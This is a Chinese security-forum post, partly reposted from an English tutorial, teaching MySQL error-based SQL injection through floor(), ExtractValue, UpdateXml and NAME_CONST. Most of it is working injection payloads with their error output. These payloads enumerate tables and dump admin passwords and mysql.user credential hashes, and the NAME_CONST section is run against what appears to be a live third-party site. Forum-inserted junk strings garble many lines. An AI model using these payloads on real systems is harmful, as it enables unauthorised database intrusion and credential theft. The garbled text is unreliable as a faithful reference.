找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3160|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
, j* q  x' T* v9 }, ~首先进行正常查询:

mysql> select * from article where id = 1;
/ H0 H% c: o9 y& _$ E$ z+—-+——-+———+
$ K! t3 T. J: M: p| id | title | content |3 Q3 d7 I; I& Y& A
+—-+——-+———+" u2 L8 g( Y- @  y% ]2 M
|  1 | test  | do it   |# d$ ~5 m1 R0 r$ N" }
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);+ o/ N: ^% ?9 R) `* Z& v$ ~1 ^& Y
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。& R7 E7 D. g' r! Y1 q: \
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);! f1 k' J# y  }1 F8 A5 c7 v
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));, J7 ~+ p1 e  \5 a
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue, I  H1 X: z6 C" l% V( P  z1 F
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–. T* r$ {' o" L2 L( d/ d
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


2 D9 v' q' E0 E5 V: ^8 X7 f1 r* H* Q! J

再收集:

  Z) S; p3 D' W. h
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
+ ^. M7 H1 v6 T# P1 m, f9 v( N. X
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
, e& j8 A+ h( s4 }4 j$ E' n- Z' A5 @' b5 U0 w3 Q8 H
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c); C  L; x  R' ]1 M, X& p7 Q
$ D" n* }$ E8 ]; ]
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
/ U3 S9 b4 K, w" t; D  H. d" w: f' f5 l: M/ f3 K9 {% J0 h
MYSQL高版本报错注入技巧-利用NAME_CONST注入
0 u0 M8 p* }3 z7 m% |5 b7 A& EIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
. p! D( u6 y* W8 [$ D" R  i" N4 A" w% t) c3 Y; n
' U9 h& j/ X2 T5 U4 `% ]& d" c
相关信息
* P% P) {7 M& C: ?. W; d; Z+ V
. Q+ K! C2 Y# h' @NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.; }, M$ y1 ~# n- j. g
% l3 k& s% h0 H4 h  v( ?: P" [
Code:
: f. F$ N% q# b: M$ SNAME_CONST(DATA, VALUE)
- ^$ l2 c2 z! [- M: {9 O7 T' y0 ?7 e
' q8 ?" I  E6 ~- ^& [: lReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
  j. J5 Y1 M# K8 i
; n4 i0 ]6 w# H6 ~8 mSELECT NAME_CONST('TEST', 1)+ B! i( F" g1 D5 B2 L

; A! c. z- Z. R
  g6 n2 \1 |0 E8 y: d7 F) B3 X  m8 |( O
|---------------|
$ m8 I- O" r8 i1 x$ X- Y|     TEST      |
( a3 x) x$ m# w. q6 _1 V|               |8 C5 a4 `0 ?4 a" S6 T  @+ }7 o
|---------------|% s/ x0 Q, |" Z# N- D% r: f
|       1       |) J# d8 ^9 H3 c
|               |" i  ~  X& a- B
|---------------|4 k9 m& c% ^2 |

1 U- Q: Z, g: i% J( x8 |) [
& \5 J, ^/ R& @) `
) f- ?0 n/ T9 C; K" I( L% `) U9 T( J& ~# N
http://dev.mysql.com/doc/refman/5.0/en/m...name-const. D5 m- g- W0 X
Intro to MySQL Variables
& T6 h) Y0 ^* ]# f+ u
" b9 m* a9 x* }/ Q7 j. JOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.  ]& |- M4 R; G' \# _0 x$ Q

7 ]: y" e* n3 o9 |1 D) ECode:9 w# x- ~# g0 |+ w
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2616 i  B0 W; ]0 \, p, z- X
: R- a8 h. o7 d7 k  Q4 n

4 b" Z: j/ B# A& e; b/ U* _
. c  `" U2 d2 s, b! \# x# O  d+ [

; }1 V& y5 Q# j6 T1 f; R  o2 B0 T, b. h/ J6 a  @/ _  c; P
Code:
9 r+ {% G; s; O. o- }2 Fand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--2 p$ p" O9 r4 R6 {4 y( C! t

, ~) G7 \1 d. x5 j
) D* J% y$ M# o0 d& ]VAR = Your MySQL variable.
( v: G8 v4 Y. c) z
6 ^8 v& v. r4 jMySQL 5.1.3 Server System Variables- c! H3 I% z3 \% p' `( \

3 b% Y; t' M& o, cLet's try it out on my site..$ j* C0 K. D0 o6 w; l  _  r5 E
: \5 C& C) K. I, U. a8 m
Code:/ a6 L' c9 c) ]
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
# f: m2 Q! F7 U& U/ e
9 o4 Q; A2 A) J3 U- UErroruplicate column name '5.0.27-community-nt'$ R; q8 x& `6 k- Q; H

3 ^5 y" _) k) u0 g% x
; @; Z0 v5 n0 [, d( {4 U. z
& }3 U7 }0 ~: x# @6 }0 h

3 `- e  H( @' V( q
' x! A. w6 i# g  b, Y5 `Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
, u: i1 ^# m$ \. k
2 [* c4 m, b1 aData Extraction9 N+ A* J3 t6 l1 Z( x% v4 ]
( g9 ]0 T7 G+ q' F
Code:6 U! u1 y, r6 I9 D1 x* j
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--1 N$ i/ E, a8 Z  y& F4 z* B( t( H
9 ^$ O6 n& N4 V5 [0 K3 m6 A

+ {5 E& e- E% IWe should get a duplicate column 1 error...
+ X0 `% n1 ^, J% f4 S' f
* r2 |& [9 b! s: JCode:
1 d; _9 d" ^$ h1 R  ]http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--1 e' P' Y; t* G4 ?6 t1 P
, @" f3 |4 T7 p5 Y8 @4 L0 i
Erroruplicate column name '1# }5 [, Q( @. j! J. M% Q' K4 J
; S8 J  H0 m, h) B2 I
0 Q1 C- x  X. @6 e+ Q- j

" m" }- `( j9 B3 k( v3 @& C% _# I; B& W7 B" T! ^4 L
0 W0 Q3 y  X3 U- {: l" L* J
  x! N8 ^! C! D
Now let's get the tables out this bitch... [1 X  V" t% Z- X) f/ y

& w) o( ]; I- XCode:3 @) m5 B) h- Q& q9 l) q7 [4 s! I
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--: M( o, u# t5 _% W
0 A  |0 Q; C4 W% p% H# p: U; \

) U5 L+ e! f9 m9 g+ L9 z: m. `Let's see if it works here, if it does, we can go on and finish the job.
4 ~8 x) ^& N' L, [: E! ^' I
8 b0 s2 v! {/ l" c" S* X' J) f- dCode:
) K. Y) i6 j1 f) Nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--, K- n* J8 v1 |, d0 g7 V4 ]
3 I) A; @& v4 l

+ n+ r: S& j/ e6 g0 BErroruplicate column name 'com_admanage
7 _. ~3 D" y4 U' [0 ]3 J$ D
- Z: @: U7 t+ ?; B( @
4 u& s+ }- T7 W" N: `& R( J" L4 N

) f. b% E/ Z2 I9 j/ o. H( B8 m& U
" X6 ?* w2 W% ]6 D! I2 D

  t; _8 @' [% s+ {
. ^9 o) T. }  E/ J' l2 `2 ]Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.. v& t" w' y* S9 A$ N1 N
. Y( c/ h/ d0 s* f: g4 P$ {
Let's get the columns out of the user table..8 P: l9 ~7 @( O; o% x* }

  x* ]6 [& n" B7 FCode:: T1 n& e7 @  h$ |" ^: o, x- i
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--8 ?+ o9 z% A, C* ^% g+ x

1 E9 {' d5 w! {: E7 |: U  ~7 G5 h, f. O
So mine looks like this, and I get the duplicate column name 'Host'., a# J5 H8 i, O, t4 a
( h3 J4 x6 B8 k5 o) P, ~$ r6 T  U
Code:
% [# X1 d1 J7 dhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
2 V; M( @8 A5 x% e  L* h% Y
7 q) f8 {$ X  a, o4 B$ RErroruplicate column name 'Host'
/ `  c. S, k" U

6 j  N4 B: z, R1 N
& J) o1 @' y9 }) e$ m: C9 m; t, I  t) b1 C
$ ?  r% x! c! q- u, N8 g- s2 B
" @! ?3 G; X% y- O
3 ]1 Y" J. Y3 H' {
Woot, time to finish this bitch off.
; @$ t$ }) R: A( h5 x4 O9 g# R
  z' ]) C( r: ]8 r& R# ]Code:
! w3 T5 N0 w3 q6 F+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--. R" U# x; _' V; m

( A% ~6 D" P+ i: Y7 L* a, F2 B+ L( E! i' h8 I5 T6 H
So mine looks like this...: @, P. Z* |: {+ H

2 G2 S3 Z- ^! Y# ^Code:
  C" k# X4 s+ Xhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
+ A+ |$ J& w2 H$ {9 _* m. F$ d" O- T
  I+ `, P+ F. ZErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
% |( E5 c6 D2 [- K

2 D+ E+ y6 l! b6 z* s) {) Z( f! i$ R5 F. E3 n

% R# H6 |6 C0 f% k
% r) R- _1 I! v) k: v/ x! V8 M& G

' \$ Z: z! {6 o  t# w- N  `$ X( H, L$ P; k5 E7 i  H, i; m
And there we have it, thanks for reading.

$ {4 U5 p* `1 e. C0 K- {' i7 x( e6 ^( V! w  u, h7 B1 I4 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表